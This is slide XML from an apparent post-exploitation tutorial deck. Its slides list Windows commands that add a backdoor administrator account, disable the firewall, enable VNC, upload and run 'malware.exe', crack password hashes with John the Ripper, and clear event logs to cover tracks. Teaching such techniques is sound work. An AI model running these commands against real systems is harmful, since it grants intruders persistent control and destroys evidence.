      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481762" y="6252329"/>
            <a:ext cx="7668101" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474976" y="6252329"/>
            <a:ext cx="7681674" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612255" y="6355318"/>
            <a:ext cx="7407116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net user hacker123 Password123 /add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481762" y="6832283"/>
            <a:ext cx="7668101" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13554"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474976" y="6832283"/>
            <a:ext cx="7681674" cy="425529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4841"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612255" y="6935272"/>
            <a:ext cx="7407116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net localgroup administrators hacker123 /add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6481762" y="7412236"/>
            <a:ext cx="7668101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Creates a new user with administrative privileges, ensuring persistent access.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7596" y="604718"/>
            <a:ext cx="7608808" cy="2055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Maintaining Persistence: Firewall &amp; Remote Access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67596" y="2989659"/>
            <a:ext cx="7608808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 ensure continued access and enable graphical remote control, we disable the victim's firewall and activate VNC.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67596" y="4157424"/>
            <a:ext cx="3021568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Disabling Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767596" y="4746784"/>
            <a:ext cx="3536871" cy="1030605"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756642" y="4746784"/>
            <a:ext cx="3558778" cy="1030605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8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975955" y="4911209"/>
            <a:ext cx="3120152" cy="701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netsh advfirewall set allprofiles state off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67596" y="6024086"/>
            <a:ext cx="3536871" cy="1403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Temporarily disables the Windows Defender Firewall, allowing unrestricted network access for our tools.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847153" y="4157424"/>
            <a:ext cx="3536871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Enabling VNC Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847153" y="5089446"/>
            <a:ext cx="3536871" cy="679728"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836200" y="5089446"/>
            <a:ext cx="3558778" cy="679728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3" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5055513" y="5253871"/>
            <a:ext cx="3120152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run vnc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847153" y="6015871"/>
            <a:ext cx="3536871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Activates the VNC server on the victim machine, enabling remote desktop control via VNC Viewer.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266" y="503039"/>
            <a:ext cx="7941469" cy="1073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Exfiltration &amp; Cleanup: Malware and Log Clearing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601266" y="1834158"/>
            <a:ext cx="7941469" cy="549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demonstrate malware execution and hash cracking, followed by the critical step of clearing system logs to cover our tracks.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01266" y="2576989"/>
            <a:ext cx="3884890" cy="3126581"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2308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95814" y="2771537"/>
            <a:ext cx="2893100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Malware Deployment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95814" y="3233261"/>
            <a:ext cx="3495794" cy="532448"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787241" y="3233261"/>
            <a:ext cx="3512939" cy="532448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9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958929" y="3362087"/>
            <a:ext cx="3169563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upload malware.exe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795814" y="3958947"/>
            <a:ext cx="3495794" cy="532448"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787241" y="3958947"/>
            <a:ext cx="3512939" cy="532448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2" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958929" y="4087773"/>
            <a:ext cx="3169563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execute -f malware.exe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95814" y="4684633"/>
            <a:ext cx="3495794" cy="824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Upload and execute a simulated malware to demonstrate its impact and verify post-exploitation capabilities.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4657844" y="2576989"/>
            <a:ext cx="3884890" cy="3126581"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2308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852392" y="2771537"/>
            <a:ext cx="2147292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Hash Cracking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4852392" y="3233261"/>
            <a:ext cx="3495794" cy="532448"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4843820" y="3233261"/>
            <a:ext cx="3512939" cy="532448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18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5015508" y="3362087"/>
            <a:ext cx="3169563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john hashes.txt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4852392" y="3958947"/>
            <a:ext cx="3495794" cy="824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Uses John the Ripper to crack the previously extracted password hashes, revealing plain-text passwords.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601266" y="5875258"/>
            <a:ext cx="7941469" cy="1851303"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3897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95814" y="6069806"/>
            <a:ext cx="2147292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Log Clearing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795814" y="6531531"/>
            <a:ext cx="7552373" cy="532448"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13551"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787241" y="6531531"/>
            <a:ext cx="7569517" cy="532448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24" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958929" y="6660356"/>
            <a:ext cx="7226141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clearev</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795814" y="7257217"/>
            <a:ext cx="7552373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Removes all event logs from the victim system, making it harder to trace the attack.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2025-07-31T05:29:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-31T05:29:45Z</dcterms:modified>
</cp:coreProperties>
</file>